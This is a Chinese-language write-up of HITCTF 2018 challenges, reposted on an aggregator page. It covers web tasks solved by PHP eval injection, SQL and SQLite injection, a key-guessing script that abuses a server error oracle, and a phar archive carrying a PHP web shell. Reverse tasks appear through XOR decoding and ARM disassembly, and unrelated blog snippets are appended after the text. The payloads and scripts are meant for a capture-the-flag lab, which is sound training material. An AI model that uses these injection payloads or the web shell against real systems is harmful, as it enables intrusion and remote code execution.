2. 程式人生 > >HITCTF 2018 wp [我真是菜鳥]

HITCTF 2018 wp [我真是菜鳥]

阿新 發佈:2019-01-09

WEB

PHPreading

原始碼洩露,存在index.php.bak,,解一下base64知道

$flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm');

輸入得到flag

這裡寫圖片描述

BabyEval

看一下洩露了一部分原始碼

<!--
$str=@(string)$_GET['str'];
blackListFilter($black_list, $str);
eval('$str="'.addslashes($str).'";');
-->

首先查到了如果是在雙引號內可以通過這樣的方式執行eval

?str=${${phpinfo()}}

然後先輸出全域性變數看一下,沒發現flag,但是看到了黑名單…

這裡寫圖片描述

然而貌似沒什麼卵用,繼續吧,是不是藏到了index.php中?但是看了以後發現也不是。。。 
/?str=${${var_dump(file(chr(46).chr(47).chr(105).chr(110).chr(100).chr(101).chr(120).chr(46).chr(112).chr(104).chr(112)))}}

可以檢視index.php,然後就猜測應該還有別的檔案了!然後最後在根目錄找到了flag的檔案

/?str=${${var_dump(glob(chr(47).chr(42)))}}
這裡寫圖片描述

然後最後費勁巴拉終於解決了問題 
/?str=${${var_dump(file(chr(47).chr(49).chr(54).chr(50).chr(57).chr(50).chr(48).chr(57).chr(55).chr(54).chr(100).chr(57).chr(99).chr(48).chr(52).chr(97).chr(99).chr(54).chr(57).chr(101).chr(50).chr(102).chr(52).chr(51).chr(57).chr(50).chr(97
 
).chr(56).chr(99).chr(102).chr(102).chr(98).chr(102).chr(95).chr(102).chr(108).chr(97).chr(103).chr(46).chr(116).chr(120).chr(116)))}}
這裡寫圖片描述

題目還是不錯的。
補充一下我的方法肯能太笨了…補充好做的方法…
這裡寫圖片描述

小電影

開啟題目一看,說是ffmpeg,立馬想到去年出的ffmpeg任意檔案讀取漏洞了,利用file協議的脆弱吧,但是這裡不太好的就是不知道檔案的路徑,猜測flag.txt成功了。
具體怎麼做,其實就是用人家的指令碼…指令碼小子…上傳的檔名必須是123.avi,最後得到flag如下

這裡寫圖片描述

BabyInjection

給了原始碼

<?php
error_reporting(0);

if (!isset($_POST['username']) || !isset($_POST['passwd'])) {
    echo 'Login and get the flag';
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="username" type="text" placeholder="username"/>'."<br/>";
    echo '<input name="passwd" type="text" placeholder="passwd"/>'."<br/>";
    echo '<input type="submit" ></input>'."<br/>";
    echo '</form>'."<br/>";
    die;
}

$flag = '';
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)|like|rlike|regexp|limit|or";

$username = $_POST['username'];
$passwd = $_POST['passwd'];
if (preg_match("/".$filter."/is",$username)==1){
    die("Hacker hacker hacker~");
}
if (preg_match("/".$filter."/is",$passwd)==1){
    die("Hacker hacker hacker~");
}

$conn = mysqli_connect();

$query = "SELECT * FROM users WHERE username='{$username}';";
echo $query."<br>";
$query = mysqli_query($conn, $query);
if (mysqli_num_rows($query) == 1){
    $result = mysqli_fetch_array($query);
    if ($result['passwd'] == $passwd){
        die('you did it and this is your flag: '.$flag);
    }
    else{
        die('Wrong password');
    }
}
else{
    die('Wrong username');
}

這個貌似是一道實驗吧的原題,但是我實在是記不清楚了,最後發現是用with rollup繞過的,但是這裡貌似限制了limit的使用,怎麼限制呢?這裡用了having,半天才想到,真是垃圾!
with rollup的特性在此不講,和group by組合生成一個列為null的插入查詢。然後用having passwd is null限制即可
最後構造如下

這裡寫圖片描述

注意passwd不要輸入內容,貌似因為mysql中的null轉換到php中是一個空字串,如果有輸入就一定是“”==“某串”,肯定是錯的。
好題好題!

BabyLeakage

這個題目我是有點不懂得,說真的都不知道怎麼弄出來了,利用了網站的報錯機制,首先顯示報錯洩露了檔案的結構

這裡寫圖片描述

然後構造這個/news/article/1/1/類似的去爆資訊
然後看到了很多不得了的資訊啊
這裡寫圖片描述

然後需要遠端登陸一下他的mysql!
這裡寫圖片描述
mysql> use F1agIsHere;
Database changed
mysql> describe f
    -> ;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| H     | text | YES  |     | NULL    |       |
| I     | text | YES  |     | NULL    |       |
| TC    | text | YES  |     | NULL    |       |
| T     | text | YES  |     | NULL    |       |
| F     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
5 rows in set (0.02 sec)

mysql> describe f;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| H     | text | YES  |     | NULL    |       |
| I     | text | YES  |     | NULL    |       |
| TC    | text | YES  |     | NULL    |       |
| T     | text | YES  |     | NULL    |       |
| F     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
5 rows in set (0.02 sec)

mysql> describe l;
+---------+------+------+-----+---------+-------+
| Field   | Type | Null | Key | Default | Extra |
+---------+------+------+-----+---------+-------+
| {       | text | YES  |     | NULL    |       |
| C10se_  | text | YES  |     | NULL    |       |
| Debu91n | text | YES  |     | NULL    |       |
+---------+------+------+-----+---------+-------+
3 rows in set (0.02 sec)

mysql> describe a;
+----------+------+------+-----+---------+-------+
| Field    | Type | Null | Key | Default | Extra |
+----------+------+------+-----+---------+-------+
| fo_Is_Im | text | YES  |     | NULL    |       |
| mmp      | text | YES  |     | NULL    |       |
| ort      | text | YES  |     | NULL    |       |
+----------+------+------+-----+---------+-------+
3 rows in set (0.02 sec)

mysql> describe g;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| 4n7   | text | YES  |     | NULL    |       |
| }     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
2 rows in set (0.02 sec)

最終答案

HITCTF{C10se_Debu91nfo_Is_Immmport4n7}

SecurePY

這個題目本來沒什麼思路,結果找到了相似的題目,這是不是TWCTF2017的題目?呃呃呃,提示是/pycache/,然後想到了這個
在 python-web 應用中,當前目錄下, .py檔案生成的pyc檔案會被儲存在 pycache資料夾中,並以 .cpython-XX.pyc 為副檔名,其中的 XX 與 CPython 版本有關。比如app.py,其對應的 pyc檔案路徑為 pycache/app.cpython-35.pyc。我們嘗試訪問:

http://123.206.83.157:8000/__pycache__/app.cpython-35.pyc

結果還真有東西!然後反編譯得到程式碼

#!/usr/bin/env python
# visit http://tool.lu/pyc/ for more information
from flask import Flask, request, jsonify, render_template
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import os
app = Flask(__name__)
flag_key = os.environ['KEY']
flag_enc = '9cf742955633f38d9c628bc9a9f98db042c6e4273a99944bc4cd150a0f7b9f317f52030329729ccf80798690667a0add'

def index():
    return render_template('index.html', flag_enc = flag_enc)

index = app.route('/')(index)

def getflag():
    req = request.json
    if not req:
        return jsonify(result = False)
    if None not in req:
        return jsonify(result = False)
    key = None['key']
    if len(key) != len(flag_key):
        return jsonify(result = False)
    for (x, y) in zip(key, flag_key):
        if ord(x) ^ ord(y):
            return jsonify(result = False)
    cryptor = AES.new(key, AES.MODE_CBC, b'0000000000000000')
    plain_text = cryptor.decrypt(a2b_hex(flag_enc))
    flag = plain_text.decode('utf-8').strip()
    return jsonify(result = True, flag = flag)

getflag = app.route('/getflag', methods = [
    'POST'])(getflag)
if __name__ == '__main__':
    app.run()

這個是簡化版本的,首先我們看到加密的金鑰要用來作為CBC模式的金鑰,那麼不出意外是16位。
我們能根據伺服器端返回來的資訊來判斷長度是否符合。我們傳入的引數key,伺服器端並沒有驗證它的型別,也就是說我們可以傳入一個list,而不是一個字串。我們為什麼可以判斷?看下圖

這裡寫圖片描述

如果是長度不匹配那麼返回上面紅色闊內return false了,如果通過進入下一句,如果json傳入null,轉換成python就變了
這裡寫圖片描述

而ord(None)會崩潰返回500!
我們嘗試一下
這裡寫圖片描述

這就說明長度確實是16位的了。
然後我們繼續看還有對金鑰的判斷
這裡寫圖片描述

這是對每一位進行判斷,某一位不通過反匯false,我們可以構造null結尾的陣列,如果通過那麼就會檢測下一組的null,反匯500,如果沒通過就會返回false!666直接寫程式把 
import requests
url = "http://123.206.83.157:8000/getflag"
key = [None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None]
for index in range(16):
    for i in range(32,128):
        key[index] = str(chr(i))
        payload = {"key":key}
        text = requests.post(url,json=payload).text
        if "500 Internal Server Error" in text :
            print("".join(key[:index+1]))
            break
        if "true" in text:
            print("".join(key))
            exit()

然後就能爆破出金鑰了,真的原題要更復雜一些,這裡簡化了。金鑰為5ecur3pPYpyPYk3y

HITCTF{O0o0o0oOracle_Attttttack_1s_yinQu3S17ing}

BabyWrite

比賽後期一航巨佬都快放出來wp了…貌似就是XNUCA練習賽login,讓一航大佬生生搞了個getshell的非常規做法,真心牛逼,這裡限制更多了一些
首先包含得到原始碼index.php

<?php
if(isset($_GET['page'])){
    $file = $_GET['page'].'.php';
    include($file);
}else{
    header("Location: /?page=login");
    die();
}
?>

login.php

<!DOCTYPE html>
<html>
<head>
    <title>CTF</title>
</head>
<body>

    登陸解鎖更多功能
    <form action="login.php" method="POST">
        使用者名稱 : <input name="username" placeholder="username"><br/>
        密碼 : <input name="password" placeholder="password"><br/><br/>
        <input type="submit" value="登陸">
    </form>
</body>
</html>

<?php
    require_once('config.php');
    if(isset($_POST['username']) && isset($_POST['password'])){
        $username = $_POST['username'];
        $password = $_POST['password'];
        if ($username === "admin" && sha1(md5($password)) === $admin_hash){
            echo '<script>alert("Login seccess!");</script>';
        }else{
            if (isset($_GET['debug'])){
                if($_GET['debug'] === 'hitctf'){
                    $logfile = "log/".$username.".log";
                    $content = $username." => ".$password;
                    file_put_contents($logfile, $content);

                }else{
                    echo '<script>alert("Login failed!");</script>';
                }
            }else{
                echo '<script>alert("Login failed!");</script>';
            }
        }
    }else{
        echo '<script>alert("Please input username and password!");</script>';
    }
?>

config.php

<?php

$admin_hash = "df650edd89a1abfb417124133daf4c103e6d2e97";

嘗試了王師傅的zip不行,問了一下說根本沒裝php zip,換了phar嘗試,結果坑到死…mmp
首先是生成就廢了很大功夫…真是傻一個單詞坑一下午!!!

<?php
$phar = new Phar('shell.phar', 0);
$phar['shell.php'] = '<?php eval($_POST[\'cmd\']);?>' ;
$phar->setStub('<?php __HALT_COMPILER();?>');
?>

生成檔案,注意的是倒數28位元組中,前20位元組是檔案校驗和,sha1處理的,我們需要重新計算,因為檔案中會加入一個=> 四位元組
首先生成的檔案是這樣的

這裡寫圖片描述

然後這樣輸入一下 
username=1&password=%3c%3f%70%68%70%20%5f%5f%48%41%4c%54%5f%43%4f%4d%50%49%4c%45%52%28%29%3b%20%3f%3e%0d%0a%37%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00%00%00%00%00%09%00%00%00%73%68%65%6c%6c%2e%70%68%70%1c%00%00%00%23%35%74%5a%1c%00%00%00%1f%41%8d%73%b6%01%00%00%00%00%00%00%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e%e5%f4%27%dc%f5%71%41%5a%47%c0%3d%32%d3%68%c6%a2%24%09%81%ff%02%00%00%00%47%42%4d%42

這個時候檔案前面會多加5個位元組!就是1 =>(或者下載下來修改後的檔案)
我們後面的工作就是加上這五個位元組,重新計算一下校驗!校驗在就是sha1…這個sha1計算是去掉後28位元組在計算…

def getSha1(filename): 
    sha1Obj = sha1()
    with open(filename, 'rb') as f:
        sha1Obj.update(f.read())
    return sha1Obj.hexdigest()

計算後更新一下…

這裡寫圖片描述

調整後輸入 
username=1&password=%3c%3f%70%68%70%20%5f%5f%48%41%4c%54%5f%43%4f%4d%50%49%4c%45%52%28%29%3b%20%3f%3e%0d%0a%37%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00%00%00%00%00%09%00%00%00%73%68%65%6c%6c%2e%70%68%70%1c%00%00%00%23%35%74%5a%1c%00%00%00%1f%41%8d%73%b6%01%00%00%00%00%00%00%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e%e7%1d%cc%17%64%66%5c%85%c9%4d%3a%7e%e9%2a%8a%cc%61%db%d8%a0%02%00%00%00%47%42%4d%42
這裡寫圖片描述

哇…好難的題目…但是真是長見識了!!!感謝pr0ph3t師傅,膜膜膜!

BabyQuery

這個題目本來我沒做出來,被上一題搞矇蔽了…是什麼Graphsql注入
首先是看一下輸入

這裡寫圖片描述

類似json的格式,然後蘇我欸的GE======其實是1的base32啦,但是我們進行別的測試的時候發現了長度限制
這裡寫圖片描述

這就很麻煩了,然後我胡亂改了一下函式名字
這裡寫圖片描述

還有另一個函式getscorebyyourname,嘗試使用它
這裡寫圖片描述

然後發現沒有長度限制啦!但是我組到這裡就jj了…
像mysql構造注入試一試… 
1' union select '1
這裡寫圖片描述

媽耶…然後正常注入試試 
1' union select databases() where '1
這裡寫圖片描述

呃呃呃???難道不是mysql,猜測是sqlite3嘍 
1' union select 1 from sqlite_master where '1
這裡寫圖片描述

應該沒跑了,因為sqlite_master是sqlite的隱藏表 
0' union select(select name from sqlite_master where type='table' limit 1,1) where '1
這裡寫圖片描述

看到了Secr3t_fl4g
然後 
0' union select(select * from Secr3t_fl4g) where '1
這裡寫圖片描述

膜一發一葉飄零


REVERSE

Baby Android

簡單的安卓簽到題目得到簡單的抑或程式碼

這裡寫圖片描述

計算結果如下 
s1 = '#$%$#!&#^_^~(:[email protected]_*#######'
s2 = 'kmqgwg]Tm3=NE_/[email protected]^'
flag =''
for i in range(len(s1)):
    flag +=chr(ord(s1[i])^ord(s2[i]))
print flag 
#HITCTF{w3lc0me_t0_hitctf}

網管的麒麟臂

沒怎麼接觸過著實嚇了我一跳,直接分析吧,其實最關鍵的要的是KEY而已
c程式碼

#include <stdio.h>
#include <fcntl.h>
int key1(){
    asm("mov r3, pc\n");
}
int key2(){
    asm(
    "push   {r6}\n"
    "add    r6, pc, $1\n"
    "bx r6\n"
    ".code   16\n"
    "mov    r3, pc\n"
    "add    r3, $0x4\n"
    "push   {r3}\n"
    "pop    {pc}\n"
    ".code  32\n"
    "pop    {r6}\n"
    );
}
int key3(){
    asm("mov r3, lr\n");
}
int main(){
    int key=0;
    printf("Enjoy Binnary!");
    scanf("%d", &key);
    if( (key1()+key2()+key3()) == key ){
        printf("Congratz!\n");
    }
    else{
        printf("Try Harder! XD\n");
    }
    return 0;
}

dump值

(gdb) disass main
Dump of assembler code for function main:
   0x00008d3c <+0>: push    {r4, r11, lr}
   0x00008d40 <+4>: add r11, sp, #8
   0x00008d44 <+8>: sub sp, sp, #12
   0x00008d48 <+12>:    mov r3, #0
   0x00008d4c <+16>:    str r3, [r11, #-16]
   0x00008d50 <+20>:    ldr r0, [pc, #104]  ; 0x8dc0 <main+132>
   0x00008d54 <+24>:    bl  0xfb6c <printf>
   0x00008d58 <+28>:    sub r3, r11, #16
   0x00008d5c <+32>:    ldr r0, [pc, #96]   ; 0x8dc4 <main+136>
   0x00008d60 <+36>:    mov r1, r3
   0x00008d64 <+40>:    bl  0xfbd8 <__isoc99_scanf>
   0x00008d68 <+44>:    bl  0x8cd4 <key1>
   0x00008d6c <+48>:    mov r4, r0
   0x00008d70 <+52>:    bl  0x8cf0 <key2>
   0x00008d74 <+56>:    mov r3, r0
   0x00008d78 <+60>:    add r4, r4, r3
   0x00008d7c <+64>:    bl  0x8d20 <key3>
   0x00008d80 <+68>:    mov r3, r0
   0x00008d84 <+72>:    add r2, r4, r3
   0x00008d88 <+76>:    ldr r3, [r11, #-16]
   0x00008d8c <+80>:    cmp r2, r3
   0x00008d90 <+84>:    bne 0x8da8 <main+108>
   0x00008d94 <+88>:    ldr r0, [pc, #44]   ; 0x8dc8 <main+140>
   0x00008d98 <+92>:    bl  0x1050c <puts>
   0x00008d9c <+96>:    ldr r0, [pc, #40]   ; 0x8dcc <main+144>
   0x00008da0 <+100>:   bl  0xf89c <system>
   0x00008da4 <+104>:   b   0x8db0 <main+116>
   0x00008da8 <+108>:   ldr r0, [pc, #32]   ; 0x8dd0 <main+148>
   0x00008dac <+112>:   bl  0x1050c <puts>
   0x00008db0 <+116>:   mov r3, #0
   0x00008db4 <+120>:   mov r0, r3
   0x00008db8 <+124>:   sub sp, r11, #8
   0x00008dbc <+128>:   pop {r4, r11, pc}
   0x00008dc0 <+132>:   andeq   r10, r6, r12, lsl #9
   0x00008dc4 <+136>:   andeq   r10, r6, r12, lsr #9
   0x00008dc8 <+140>:           ; <UNDEFINED> instruction: 0x0006a4b0
   0x00008dcc <+144>:           ; <UNDEFINED> instruction: 0x0006a4bc
   0x00008dd0 <+148>:   andeq   r10, r6, r4, asr #9
End of assembler dump.
(gdb) disass key1
Dump of assembler code for function key1:
   0x00008cd4 <+0>: push    {r11}       ; (str r11, [sp, #-4]!)
   0x00008cd8 <+4>: add r11, sp, #0
   0x00008cdc <+8>: mov r3, pc
   0x00008ce0 <+12>:    mov r0, r3
   0x00008ce4 <+16>:    sub sp, r11, #0
   0x00008ce8 <+20>:    pop {r11}       ; (ldr r11, [sp], #4)
   0x00008cec <+24>:    bx  lr
End of assembler dump.
(gdb) disass key2
Dump of assembler code for function key2:
   0x00008cf0 <+0>: push    {r11}       ; (str r11, [sp, #-4]!)
   0x00008cf4 <+4>: add r11, sp, #0
   0x00008cf8 <+8>: push    {r6}        ; (str r6, [sp, #-4]!)
   0x00008cfc <+12>:    add r6, pc, #1
   0x00008d00 <+16>:    bx  r6
   0x00008d04 <+ 
 

            
  

           

              
              

            

            
相關推薦

			   
            
            
            
 

    


    
    
HITCTF 2018 wp  [真是]

     
 
							
							
							WEB



PHPreading

原始碼洩露,存在index.php.bak,,解一下base64知道



$flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag); 



  
 

    


    
    
怕誰

     
  
 
 
  
    
  Description 
  lin2144是一隻小菜鳥,都是笨鳥先飛,lin2144想來個菜鳥先飛,他從0點出發 一開始的飛行速度為1m/s,每過一個單位時間lin2144的飛行速度比上一個單位時間的飛行速度快2m/s,問n (0 < n < 10^5) 



  
 

    


    
    
Fi也有版本號了! | 

     
 
			Wi-Fi也有版本號了!
		
			 Ronny  2018年10月15日  暫無評論  閱讀 384 次 		

		

		據Solidot訊息,行業組織 Wi-Fi 聯盟宣佈當前的版本 Wi-Fi 802.11ac 重新命名為 Wi-Fi 5,而下一個版本 802.11ax 重新命名為 Wi- 



  
 

    


    
    
DOS 1.25/2.0 它已經 36 歲了。 | 

     
 
			微軟重新開源 MS-DOS 1.25/2.0 它已經 36 歲了。
		
			 Ronny  2018年10月16日  暫無評論  閱讀 441 次 		

		

		


導讀
2014年3月,微軟通過計算機歷史博物館放出了MS-DOS 1.25、2.0兩個早期版本的原始碼,並講述了該系統的早年 



  
 

    


    
    
【碼海座標】沒錯,但是不會放棄努力

     
 
                    
                        
                        專欄達人
                    
                    
                        授予成功建立個人部落格專欄 



  
 

    


    
    
【小橋流水的專欄】,但是在慢慢地追著大牛的步伐。。。

     
 
    博主簡介
    
        
南郵碩士畢業,現就職於奇虎360上海研發中心,研究演算法資料結構,C++,Python,Linux,Docker技術,安全准入技術,網路安全,服務計算。博主QQ:673771573
    

		    		    
         



  
 

    


    
    
[HDU 2520] 怕誰(不一樣的for迴圈)

     
 題目連結:http://acm.hdu.edu.cn/showproblem.php?pid=2520 
 
  1 //學學不一樣的for迴圈
 2 #include<iostream>
 3 #include<cstdio>
 4 #include<cmath>
 5  



  
 

    


    
    
的那幾年 nuxt.js axios 封裝

     
 nuxt.js axios 封裝 
1,首先安裝axios 
npm install axios 
2,在專案檔案pluginsw資料夾裡(哪個資料夾自己隨便啊)建立axios.js,程式碼如下: 
import axios from 'axios'//定義fetch函式,config為配置export fu 



  
 

    


    
    
之路

     
 
                
在Javascript中void是一個操作符,該操作符指定要計算一個表示式但是不返回值。
void 操作符用法格式如下:
1. javascript:void (expression) 
2. javascript:void expression 
expression 是 



  
 

    


    
    
JNI學習(3)()-jstring介紹

     
 
                
所有內容為記錄學習過程,不是大牛敬請諒解。所有分析都參考深入理解Android 卷一
Java中的String 也是引用型別,不過由於它的使用頻率有點高,所以再JNI 規範中,單獨建立了一個 jstring 型別表示java中的String型別,雖然jstring 是一種獨 



  
 

    


    
    
:hadoop之mapreduce設計理念和基本架構

     
 
							
							
							MapReduce 是一個分散式計算框架,由 程式設計模型 和執行時環境 2部分組成。 
程式設計模型為使用者提供了非常易用的程式設計介面,使用者只需要像編寫序列程式那樣實現幾個簡單的函式即可以完成一個分散式程式。 
而複雜的節點間通訊,節點實效,資料切分,都有 



  
 

    


    
    
2018 moeCTF新生題-----一個的部分WP

     
  
 
 嗯嗯,畢竟我還是個資訊保安的小菜鳥,就去看看題目練練手,一起加油吧 
                                 &n 



  
 

    


    
    
getline() 把弄得捉急,表示很無力

     
 
                
今天看了一下cin.get(), cin.getline()與getline()之間的區別,在用VC編譯的時候發現getline()要兩次回車才能輸出結果,上網谷歌了一下,發現網上有人已將解決辦法告知,據說這是個BUG,菜鳥表示很無力!!!、
只要將string裡的檔案修改 



  
 

    


    
    
了解點“調查取證套路”刀在你

     
 線纜   from   日期   數據庫   析取   判斷   公司   錯誤   評估    

作者:i春秋作家——細心

一、前言
我們為什麽要了解,調查取證?我們大部分人都是玩“日站”的,調查取證有什麽用!取證在於揭示那些發生在網絡及其設備上,有意義的,先前不人為不知道的,只有知道了以後我們才可以改 



  
 

    


    
    
PowerShell 運維系列-02-批量取n臺Windows KEY(2018年大年初一奉獻)

     
 log   margin   tac   刪除   階段   運維人員   pen   lastlog   9.png    系列博文:PowerShell 運維菜鳥系列-01-批量為n臺服務器導入PFX證書(2017年除夕奉獻) http://blog.51cto.com/dynamic/2071716 項 



  
 

    


    
    
完整安裝always on 集群——轉自就是

     
 打開   lan   恢復模式   賬戶連接   技術   故障轉移   server   bubuko   數據庫恢復   

1、  四臺已安裝windows server 2008 r2 系統的虛擬機,配置如下:
CPU : 1核
MEMORY : 2GB
DISK : 40GB(未分區)
NetAda 



  
 

    


    
    
帶你看原始碼——看不懂你打ArrayList原始碼分析(基於java 8)

     
  
 
  
  
 
 
  文章目錄
  
   看原始碼並不難
   軟體環境
   成員變數:
   構造方法
   核心方法
   
    get方法
    remove方法
    add方法
   
   結束
  
 
  
 看原始碼並不難 
 如何學好程式設計?如何寫出優質的程式碼?如 



  
 

    


    
    
Java程式設計師從笨之(八十五)跟學jquery(一)愛之初體驗jquery

     
  
  
  
 分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow
 
 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!
 
 
          



  
 

    


    
    
五張圖幫你辨別程式設計師中的、普通、大牛和大神!

     
  
 
 這屆的沙雕網友太厲害了,自創程式設計師鑑定套圖,菜鳥、普通、大牛到大神四個級別的程式設計師,分別被劃分為四個座標象限,真是太有畫面感了~ 
  
 每天穿拖鞋背心,看起來吊兒郎當的,往往是程式設計師裡的“掃地僧” 
  
 菜鳥程式設計師不出么蛾子,團隊怎麼會有事做 
  
 緣分到了,BUG自然就 



  
 

    


    
    
PyCharm的常用功能介紹,對於來說,這點功能暫時夠用了

     
  
 
 
 1. 設定行號 
 在安裝PyCharm後,在程式碼編輯介面中是預設顯示行號的。但是有的讀者的PyCharm不現實行號,此時可以依次單擊File>Settings>Editor>General>Appearance, 在彈出的“Appearance”介面中勾選“Show